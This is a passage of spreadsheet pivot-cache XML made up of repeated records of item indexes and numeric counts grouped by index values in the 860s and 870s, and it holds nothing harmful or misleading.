    <x v="860"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="860"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="860"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="860"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="860"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="860"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="860"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="860"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="860"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="860"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="860"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="860"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="860"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="861"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="861"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="861"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="861"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="861"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="861"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="861"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="861"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="15"/>
    <x v="861"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="20"/>
    <x v="861"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="861"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="861"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="861"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="861"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="862"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="862"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="862"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="862"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="862"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="862"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="862"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="862"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="863"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="863"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="863"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="863"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="863"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="863"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="864"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="864"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="864"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="864"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="13"/>
    <x v="864"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="864"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="24"/>
    <x v="864"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="864"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="864"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="864"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="139"/>
    <x v="864"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="268"/>
    <x v="864"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="864"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="864"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="865"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="865"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="865"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="865"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="865"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="865"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="865"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="866"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="866"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="866"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="866"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="866"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="866"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="866"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="866"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="866"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="866"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="866"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="18"/>
    <x v="866"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="866"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="866"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="811"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="867"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="867"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="867"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="28"/>
    <x v="867"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="37"/>
    <x v="867"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="867"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="867"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="868"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="868"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="868"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="868"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="868"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="868"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="869"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="869"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="869"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="869"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="869"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="870"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="870"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="870"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="23"/>
    <x v="870"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="870"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="870"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="870"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="871"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="871"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="871"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="871"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="871"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="871"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="872"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="872"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="872"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="872"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="872"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="872"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="873"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="873"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="873"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="873"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="873"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="873"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="11"/>
    <x v="736"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="874"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="874"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="874"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="874"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="874"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="874"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="875"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="875"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="875"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="875"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="875"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="876"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="876"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="876"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="876"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="876"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="876"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="876"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="877"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="877"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="45"/>
    <x v="877"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="877"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="877"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="877"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="878"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="878"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="878"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="878"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="878"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="878"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="879"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="879"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="879"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="879"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="879"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="879"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="879"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="879"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="879"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="879"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="22"/>
    <x v="879"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="879"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="879"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="879"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="880"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="880"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="880"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="880"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="880"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="880"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
